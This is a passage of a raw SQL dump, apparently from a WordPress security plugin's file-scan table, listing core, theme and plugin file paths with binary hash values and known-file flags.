�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�-�T�\0�2�L-�','�ȴ����g�A�]�z-ۣ��᷸[�','',0,'?'),('�ĵ>��#B��b���','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ۓ���G�c,��=c^�','�����G�c����t(5\n,9%�����)�e','',0,'?'),('�ǃ��I\Z�,ƶ���D\r','wp-content/themes/doctors/core/contents/part_footerWidgets/footerWidgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3iuꅪ=��?�=','&�Ս��Q���/]wT T�=N<7ql ң���','',0,'?'),('�Ȧ0� $�7O>���','wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�Ǻ\Z��.��զ','ڟXZfd�ޱEd4�z%��×\0cKc�J�l^','',0,'?'),('��G]��9���e7��(','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t���7[�x�蛴','8�I��ԉo�)\'z�R�^�-M1\'�\0����','',0,'?'),('��Yv�z�֗*�9��a','wp-includes/js/jquery/ui/tooltip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�<Q�1}�������','�M@�jM�m��\\����`T@�.���Rl.��','',0,'?'),('��$dp���C����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z\'�ZP��ie����','6m�<g��\0{tX��)��U�4�N�4M�3','',0,'?'),('�������ä���=-�','wp-content/themes/advance/inc/kirki/assets/js/controls/custom.js',0,'��ُ\0�� ��B~','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��eş+�\r�� ���','wp-content/themes/twentytwentyone/assets/sass/02-tools/functions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~/���+(7�D��',')�vIy��a��\"?����@v�pYAqJ���>�','',0,'?'),('��&��=N��u�#y','wp-content/plugins/wp-cerber/assets/flags/bw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�]G��G�9�P','#�O�mT>O���://c/Pu�$0�����','',0,'?'),('�%�f\\+,���\0\\Y','wp-admin/includes/class-wp-filesystem-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O��r�݇o��','�Yb�eA\'�#�đÎؚ��[9��=-&S�TT�','',0,'?'),('�*����\'Kj��̰!c','wp-content/plugins/wordfence/waf/pomo/plural-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P!�7G�NJ�q`.','.��\n)[.��c�f��\r�\rF��Z�k����','',0,'?'),('�6������W#��0�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/style-admin.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%u�q�y���>�ۻ=','��8�h��1�ԭ[\Z�L�K焿d�j<W��','',0,'?'),('�8�)��#�uJ�N{P��','wp-content/themes/weblog/assets/library/SlickNav/jquery.slicknav.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ꖋі�r�ײ��D','�����#��v�o$�Eq#8�5���YƂ','',0,'?'),('�?7�`��9���Å','wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��If�D�S~�Ee;\"','-�L\\Z�%���Er_^nniW�B-�mC���5A','',0,'?'),('�\\1݃�%�VE|<N��','wp-content/plugins/wordfence/modules/login-security/img/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����mP�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('�e ��_M���[rH','wp-content/themes/doctors/core/contents/loop_page/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Os��|˯�\\��N�}�','�`�\Z�i�+FZNd�����ӥ?��?�R�T��','',0,'?'),('�i���4��Zl�Ѓ @','wp-includes/css/dist/block-editor/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W.�M�л�=@�D�Yw#','�1.�f���\"|�R�;x�7B�6����3a���','',0,'?'),('�U����2\'���-��','wp-content/plugins/disable-gutenberg/fonts/awesome/fontawesome-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gOP҇�č�����','���~8 ir���\nPp��\n2�5�DahBzP','',0,'?'),('��r��M�ܴ-\nS��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eR��r�#�U���犏','���s�Gd��l�IB-?`7|r�R��3����V','',0,'?'),('�ɰŏEr��%�`\0��','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/previewer/components/epsilon-previewer-object.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>o\Z��\Z�z��-�� �','d��ə����i���W�z��|Duu)�����`','',0,'?'),('���\0e�NE��?','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/admin/components/notices.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':<���da{�a�','��h�W�Z8_~���N@�;.�EN�%��פ/','',0,'?'),('��\Z�$]�W��wP�l','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�We�U{�9�','������G����8�=�\0�> �3�wg3.�4','',0,'?'),('��^��bR��SI�!�?','wp-includes/class-wp-image-editor-imagick.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U��--�� �2��6','\0\\��0*���%Qݯ�O��^��8��G�z','',0,'?'),('����sk�6/��н�','wp-content/plugins/wordfence/lib/wfSupportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!eZu\0z�[�O��O��<','�Q:4s-¦�\n��y���}�x�z���5�','',0,'?'),('�86fod�/J��v�','wp-content/themes/advance/inc/kirki/includes/output/property/class-kirki-output-property.php',0,'_[M\"]���00�ö�P','_[M\"]���00�ö�P','U���jA ��\n�a�cD��_�Q\"-��.� �','',0,'?'),('�@��M]\"���iNJ','wp-includes/class-wp-http-requests-hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,ͣa4h��D�U�+','�5���կzV��Rt�I/�+˘H0N����\'C','',0,'?'),('�L默�e�<�0h~�','wp-content/themes/healthcare/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bم�f��F�K|','�Z�cO\Z���V�W˂�Ѣ�\r��z���*;��','',0,'?'),('�Rs�2�չ���=','wp-content/plugins/wp-cerber/admin/cerber-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�pz$]��?gj�','��������<��^�M�v��5�Ò����j','',0,'?'),('�Z���(>(�1bޫ�Z�','wp-includes/js/tinymce/skins/lightgray/content.inline.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lo7�r79wA�U�E','���E���P���[���x�v1i0�h;����^J','',0,'?'),('�\\�����$�I�H��','wp-includes/js/jquery/jquery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� 3i��7�L�1�<','�s��)=\'�5r����l�}�<�(v\'ܘl�x\Z','',0,'?'),('�b��VE��7f�� ','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�NI\0�/i���~��','�����\\&��r-������J������͠#','',0,'?'),('�e����:֬p6�','wp-includes/js/dist/vendor/wp-polyfill.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7E�~?V�֬��o�B','b1�r�������J�w���./2�M��`','',0,'?'),('�fqm{���G\Z�̕�`','wp-content/themes/healthcare/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���oH�)AQ3�Q','��Zݯ;0v��-�7dqQ\nwƕ#u5�8W�h','',0,'?'),('�q�@/��ꦑٞ-M�','wp-admin/network/site-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?:Ĉ�-�żѐ\\x)p','�2�-�X����)��\rP�����bV�ҝb)sV','',0,'?'),('�wR V;(�N��S���6','wp-content/themes/wp-barrister/people-post-type-main.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�X���8�<�(J�','\"HE���X���E�/�u�l�q��ꓙ�','',0,'?'),('ᅂϖ%9����\0��D','wp-content/plugins/redirection/images/donate.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yyv:i�\n�����Cb','�y�<9�\n�v�QZB\\~Xt;���~#2x� Օ','',0,'?'),('ᕵ7\\F�|�[E����l','wp-includes/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0���s0C{[��[t7','Z�z`�}���J�GN]����l��Q��8��H','',0,'?'),('�>���\n�5����Z','wp-includes/customize/class-wp-customize-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�f�� ˥�^�К','�\nu��8�\rYY��:\nVk���.aG��GoM','',0,'?'),('�5��6觙|y��`','wp-content/plugins/all-in-one-wp-security-and-firewall/images/arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G\r�6\n���4����','��!�-{��Fe�W(��=\'y�j��tm�8�','',0,'?'),('�;�Dth�E�G�>�H�','wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����o�����\\�','��Zm�$z��p�uC��VgIgI���N�','',0,'?'),('���m|�yb����','wp-includes/class-wp-recovery-mode-email-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ��Gu�n���Et','Y�ѾLP����=NL������*Π�T9�I�(','',0,'?'),('��l`o�ݢ� �8�\Z','wp-content/themes/weblog/acmethemes/customizer/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:4l�ޕE�U�','�� VQn2�_���-y�h��&m�f�O�;+','',0,'?'),('�ؚ����Y{�Y��ht','wp-content/themes/healing-touch/css/nivo-slider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����0��S�wY��G','\r�X˺��]\'�_A�vJ���\n��^��\0$e6D','',0,'?'),('�߶��(8<�;','wp-content/themes/healthcare/css/font-awesome/less/stacked.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�+-&9��ʡ�QKKN�','Ͻ�,�¿4���IF�\0e��Y�o���5��Ý9','',0,'?'),('��\\9ã>���Iz4�c','wp-includes/js/tinymce/plugins/hr/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k+%�5l3�!-��','�2`���Ri�L��#e�4�6�g�p�o~�','',0,'?'),('�8�\n�����o��','wp-content/themes/twentytwentyone/assets/css/style-dark-mode.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�И�]e��Ğ�c%�I�','�\\H�XE�[����h�������YT��Uƥ','',0,'?'),('�`\\l�+�S��bs','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/minicolors/jquery.minicolors.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�O��%I7s��7�','��{u5�2UJ�`�\\�`�@o��B>{��lY \\','',0,'?'),('�BK���A�a<�l2','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xߓ�Œ\"X3�6DQ�','!�l.�.��GI�\n7oe�ѿ�\';I�\n\n���','',0,'?'),('�L�>�ٟ�#{6p}Y��','wp-admin/options-writing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ì�,{J�>M*\ZY��3','�������C�I�T��H&3��8�̞n�','',0,'?'),('�U6υs�d�~x���','wp-includes/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�*�un�rdu�g���','�ҷ<h�bo�>�W��\Z�N��� e��ia�','',0,'?'),('�^}R �V7{WI\rH','wp-includes/blocks/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','էL\n�8���{s���','x�\Z�R�>ؼ�:�@3�W@f�e�f����L�','',0,'?'),('�y�0H�#;�e\n\"�+','wp-includes/js/dist/server-side-render.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�eQǔ;-P7�苛�d','rP���^�ç\Zx~�;�����\"�x]43s','',0,'?'),('�{K~�ղ���Ų��ۨ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k&���}�;1','�.v;�q��]�m�,�\\ؔ���Zr�.�\n{','',0,'?'),('��:�6d�e\'O','wp-content/themes/twentynineteen/sass/site/secondary/_widgets.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӟ=:&��$.���W`vI','�u����y�Һ\0v�&�%�0)^�\ZA�6�','',0,'?'),('�.����#','wp-content/themes/regina-lite/layout/js/plugins/skip-link-focus-fix/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vt� =P�tp�;��t','F#{י���� \r�0&E�9�p�yl��y\'��','',0,'?'),('��Za9�U�z��ն','wp-includes/class-wp-date-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�U�� �L]-�Rs�@�','ֲP4]���! o3\n��l���Q�0�','',0,'?'),('�э�G��oD�����','wp-content/themes/wp-barrister/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��3�K�����&��','�#2f!�����4�����G��/Ȼ�|{','',0,'?'),('��a�T�a�>z�~&�','wp-content/themes/healing-touch/images/icon1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����R\\�_j z�-','�/��bV��\"�?@�e/��_��D�懙:�ň2','',0,'?'),('��ĸ:�,p�1��Hr','wp-admin/js/dashboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��)�{)�%�','�{G���\n�<Q�IO� ���%�k���%','',0,'?'),('�\0��וoxi3%\r+]kg','wp-admin/images/post-formats.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K���\0���%3���','9ƺ�&�]��n�Eu��a]iF���Ƴ�','',0,'?'),('�\n�Ե��N3���E','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-multicolor.php',0,'������þ�ڱ\nN��','������þ�ڱ\nN��','6�3�!(�Nd�\"��u��\0��p+�^)}`�Ü$�','',0,'?'),('�\rSL<�8\0_��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-general-init-tasks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ns(�y��\Z�l#�$','&���Q/�HT]���Պ�p�}��|e�ZVq9','',0,'?'),('��$d�ЦW���H\'�','wp-content/plugins/disable-gutenberg/inc/settings-display.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jt\n��(�\r�+\\','���/���m.D�{�n�+�M.��V8�#�Ѿ�W','',0,'?'),('�%�)����ǣ\0�','wp-content/themes/healing-touch/js/jquery.nivo.slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ե@y����|�','�&���Z?��lؔ��4*�qH���+��Z\r�','',0,'?'),('�+�\Z�5�JR���|*e','wp-content/themes/doctors/core/customizer/color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3��h�˃��Y��L3','�Q] ��]��7��SL��;5_ܙ�*���,','',0,'?'),('�0�;�-,�A�Ey�','wp-includes/theme-compat/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�S��;��I��(','���U�kx�r��Lb�\"��JAF�(u; \0�&','',0,'?'),('�B��\"^I\n���hƜ','wp-includes/js/dist/dom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϗL\'n��f\\��FFE','�[J`aq�ݭNc�;���eȜR��\Z�p.�','',0,'?'),('�Iie�b1o4#��b','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-database-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#���j�ֺ�~�9&�','U? ��y�d��u�{m 5�3��>�՛�\n�\n�','',0,'?'),('�O�u�6��o�G��','wp-content/plugins/wp-cerber/assets/flags/lr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�a�!^KG�C �,�','b쁣������=Q��*���IGTG �!]E��9','',0,'?'),('�Vʰ�4�8�+��z','wp-content/themes/wp-barrister/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O���5��r�B�O','�[BnI�\\�|D\'�#TLWj\"g�<9Ƀ��z��J','',0,'?'),('�a�Oj\'�ŻD*ցV4','wp-cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�>F�m8ɃK`�','hi��g��F���-�� 0&������yl�','',0,'?'),('�m�5^���u��9>','wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zy���.^�(/t�t','�6�/|�\'��kI7Yҝ���8~l� �H���6','',0,'?'),('�tM�&�x�V�����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/_config.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�142�%��F��)�','هO�x�,�{e>�z�Ɂ���s����2C��ܳ','',0,'?'),('�#�\' �~����/z�F','wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ޜ�t�j̥<�','�������T���� ?W��E>}�u���+��','',0,'?'),('�e�\\�k�c��Xf','wp-includes/customize/class-wp-customize-upload-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؓ�B8�?)ivr��`-�','�~t~��X���% ��K/3-n6\0�RB�֨G�','',0,'?'),('��q�82��v�&#M','wp-includes/js/tinymce/plugins/wpview/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j5q��S\rX���i��','Ej\Z��\Z�I���3J��G�jVݒ��6<S�9P','',0,'?'),('��H�����%��,��','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��%;w���Q�8��@','wi>�6�Ƭ�4��.N�C���\Z�4�IO��','',0,'?'),('���<kUJv%��1��','wp-includes/fonts/dashicons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7����|�����Z','�D��D+ve�h��s>���Z�fo��vW�~,=','',0,'?'),('��%���}��i�','wp-content/themes/advance/inc/customizer/fields.php',0,'+�r�0�a�X_�͖Zw','+�r�0�a�X_�͖Zw','�LN�\\A^G�,�M5�~��.� �h%7rM*','',0,'?'),('���#�iJ�H�?�@�','wp-includes/class-wp-http-curl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�`3F�O�,;N#���','��@�� ����T��(�\nD�ڠ��Y�� �]�2','',0,'?'),('�\rn�Ө$�\n�V��|','wp-content/themes/skt-toothy/images/free-vs-pro.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�ۓ\"���K���f','Gb�����V�����Bk�(�,zJ�%j�\Z�\"9','',0,'?'),('�w����V���!�','wp-admin/includes/class-wp-ms-themes-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��8�����Lk�5�Ѕ','�\'�<o��\'.��G�\"��v�2gwi̋\0','',0,'?'),('�\r����a�!)��lM�T','wp-content/themes/wp-barrister/library/images/icon-search-w.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\nk\'� \0.�3�x��','�z��[�MQ<���U� ��9�@s��\rk�','',0,'?'),('�\Z�K�^���\n�','wp-includes/blocks/image/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�s�d\'���+h���','�,)�\Z����Z8��u�A�,i^���bes�t','',0,'?'),('�^ۛ�������F','wp-content/themes/twentytwenty/assets/css/editor-style-block-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H\0���8x��^��B','}߮�Y���+�H ܥ`�֒�#�ʅx�-�6','',0,'?'),('�te��+����U�O��','wp-admin/js/index.php',0,'��&��\0%�d`x�B','��&��\0%�d`x�B','�qʊʧ�w\0��߭�*cg1(��7��\\��5t','',0,'?'),('�z^}��¤hh3\r��w','wp-content/plugins/wordfence/images/options.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��Ѵ����A�','D:�bw�#^����4�B�KIP�? z�n�V�_','',0,'?'),('䆮G*�~�5H���I','wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lS?,�ra�4;�^F','�D�;�䏑��eH�i�b�\Z�?�b����','',0,'?'),('�x����4���qL�','wp-content/plugins/redirection/locale/redirection-en_GB.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8#ql��� s�4��K�','J���}�j�����7�]:�[og\\����','',0,'?'),('䗦���L��z/��%','wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��2J娳�YB瘱�','\ZP�L㨒���Zi�t�A�������7d�','',0,'?'),('����zpKC�{\\>��','wp-admin/js/dashboard.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VP�k��\Z��l(�','/S�\0�\\��T��Z��OL\\3aˑ���','',0,'?'),('���1�]�M|�K�FZ','wp-content/plugins/wordfence/lib/wfBulkCountries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9 +Oyծ�urO�3�\n','X&o1\'�cg��ml��yS����t�����\r','',0,'?'),('�\00��q�ĊNy)��','wp-includes/plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�v/�M��;�7/N:','AI�OZl���wC�fj�@�r}���H!ѧ�Q','',0,'?'),('�\'�`F̔�~�Ė��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���؍��0�+C����','`>&i(Ź���C���f���&���>Y\"�','',0,'?'),('�4����m�T曢�A','wp-content/plugins/wp-cerber/assets/flags/cx.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^�f��mW}}]�','db\'f-�LZ�\0g �]��_��\'���o','',0,'?'),('�C�Ǵ��k�q{.L','wp-includes/js/dist/block-serialization-default-parser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��ņ��%ٔ2����','����H��l�Eb?�y̥l�N��+��6x�3m','',0,'?'),('�H��4�.\\�:��#��','wp-admin/css/l10n.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+.�[H\rϬ.k��/ ','�������lg����j-u��\\$?���)\\�y6@','',0,'?'),('�R��5?�- S�^H��','wp-admin/js/editor-expand.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K�\\(��p���[','���;W#�}Gj�[��K�SAKZ�iˤ[Q4c\n','',0,'?'),('�c��(�ǰƅE��','wp-content/themes/regina-lite/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]`BRJ�-Z\0ݕ��','�s���9��t�2%�{b�ى��+�2�Oq��','',0,'?'),('�eŐ��n���A�','wp-content/plugins/wordfence/lib/wfView.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�ܺ�-ˆN\n�\\�nO','x�2Q����mk٫@IFRh�Hu~�R8�\"z�K4�','',0,'?'),('�nb\"�[���M �f��','wp-content/themes/advance/inc/kirki/includes/class-kirki-l10n.php',0,'s>��pa��f]�{�m','s>��pa��f]�{�m','�7/�x�+Cgn�#���J��\"MYB���s�','',0,'?'),('�wʼnZ��-��\n��r','wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�c�\Zම#\Z֭','��|N�\0��a69�A��1N�%+���','',0,'?'),('�W��������','wp-content/themes/regina-lite/layout/images/home/slide-1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�7�&�O�Giشc�','����\n8�̰S9���3�k*�I�,��AY�','',0,'?'),('���5�1Q�?�_��','wp-includes/https-migration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s9�4W#2��!H�߾�','2�|P��Ł�muН���~k��37rz0�x�A�','',0,'?'),('�eayi�H].�*�','wp-content/themes/regina-lite/layout/images/team/team-member-4.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��E/.��\"��\0��','�_m�d?m�O�|��Zt�?�\0A\\.m�=���','',0,'?'),('媝�(�(\'�a����','wp-content/themes/regina-lite/layout/js/plugins/html5shiv/html5.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wj�e*ݑ��\'��','�J�GU$ܫ�3�ރ��E��:O2�%�!-���','',0,'?'),('峳$� @z6�\0`��/�','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ջ}��B��H��71','��\"�beTb�$�����\n���~�ln��','',0,'?'),('���9n��w3�f=�B��','wp-content/plugins/redirection/actions/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R���_6��G�|','pÝ<2� ��c�h��y^��Ҫ�T��Z��','',0,'?'),('���b+GCR02C�߆','wp-content/themes/healing-touch/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�Ju!��^T�VP<','�R�Q�����E��&$RF���%hS��)��','',0,'?'),('�\r�b\\��ɍ�\Z��','wp-admin/edit-form-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-gP\" �P+Pg��h','����b�$磷#�6��Db˓���Z����4l(','',0,'?'),('�+���.��eF��','wp-admin/css/dashboard.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��w.��Ş1->�QY','�}5�X_Kr�Oe�鎜��g�i�v��\Z8��','',0,'?'),('�6�n��[l��vq','wp-content/plugins/wp-cerber/assets/flags/bl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�9e���kk�R�o���S','wp-includes/embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V\Z���/}ͳYM=��','6K�(|�/�R��̵�;$.�Jf8{�v�G�','',0,'?'),('�G��5�@����07��','wp-includes/images/blank.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʟg��h�kK��f','>��E�G��L�� E��JQ���|�B���ij�','',0,'?'),('�J~_o�f�k�����','wp-includes/js/wp-embed.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R%�qU�0�8}_��','ޚT�d����U�2#*_�D�WQT�n�I%Ǭ�','',0,'?'),('�]>s��[�G�T)�y','wp-content/themes/weblog/acmethemes/hooks/footer.php',0,'^�EKi��R��&-��','^�EKi��R��&-��','�d��{c�]\"~Ǣ�v�u�P���=�j�O%','',0,'?'),('恴L�ޠe���/�u�','wp-content/plugins/wp-cerber/assets/scanner.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g#z���w���l\n\'�','�q��̇P�I��.K�{r�P��|��F\n�m','',0,'?'),('悾�8:Ҍ��:���','wp-content/themes/skt-toothy/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r�����P͈;��ԥ','s^������̯h�]����XDc�϶��I[�','',0,'?'),('様��7�^�b�\"�','wp-content/plugins/wordfence/images/back_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h���g��i���>','�䏛N�7�g�?�Fb!}��ݿ��C��鳇','',0,'?'),('�y�l��s�U>�<��','wp-includes/css/customize-preview.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b���Sb�s��\"','ߌ��I�R�\\Ĺ�e��z3�QsC����Q�','',0,'?'),('����eҕ�h�V�\"�','wp-content/plugins/wordfence/views/options/block-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�PK���.ٳ�\r','�+�>�����U��a`.4m킳+����U','',0,'?'),('�Ú�S]���\0�k�|','wp-content/themes/healing-touch/images/icon3.png',1,'\0\0\0\0\0\0\0\0